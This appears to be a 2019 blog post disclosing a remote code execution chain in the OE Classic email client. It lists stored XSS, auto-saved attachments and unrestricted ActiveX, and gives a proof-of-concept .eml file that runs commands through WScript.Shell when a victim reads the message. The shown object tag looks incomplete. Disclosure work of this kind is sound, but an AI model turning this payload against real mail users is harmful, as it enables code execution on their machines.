вторник, 16 апреля 2019 г.

OE Classic <= 2.8.0 RCE via stored XSS

OE Classic - Popular desktop email client based on old Internet Explorer. I think it's just luck that I can find that XSS and turn it to RCE because technicues that i use is very old, and i doesnt research it in past.

Vulnerability #1
Type: Cross Site Scripting
Severity: high (because used origin file:// and attacker can read files via javascript/vbscript)
Description: Application use IE for render HTML and havent good sanitization.
<BODY BACKGROUND="javascript:document.body.innerHTML='<textarea id=x>prompt(1,location);</textarea><button onclick=eval(document.getElementById(\'x\').innerHTML)>run</button>';">body</BODY>

Vulnerability #2
Type: Autodownloading attachments and email in same directory
Severity: high (because attacker can run any file via relative path)
Description: when victim user read email, content of it and all attachments downloads to this folder: C:\Users\%UserName%\AppData\Local\OEClassic\Prg\T\1-%number%\

Vulnerability #3
Type: Old IE for rendering without ActiveX security restrictions
Severity: high (because attacker can use arbitrary ActiveX object)
Description: Old IE can use arbitrary ActiveX object. This functionality leads to RCE (Examples: https://www.exploit-db.com/exploits/11229, http://www.guninski.com/wmp-desc.html)

Full proof of concept (.eml file):

Subject: calc
From: test@gmail.com
To: test@yahoo.com
Content-Type: multipart/alternative; boundary=bcaec520ea5d6918e204a8cea3b4

Content-Type: text/html; charset=UTF-8;
Content-Transfer-Encoding: 7bit

<BODY BACKGROUND='javascript:document.body.innerHTML="\x3ciframe style=display:none src=./test.html name=test\x3e\x3c/iframe\x3e"'>BACKGROUND</BODY>

Content-Type: message/rfc822; charset=UTF-8; name="test.h\tml"
Content-Transfer-Encoding: 7bit

<object id='wsh'
wsh.Run("cmd.exe /k calc");

Комментариев нет:

Отправить комментарий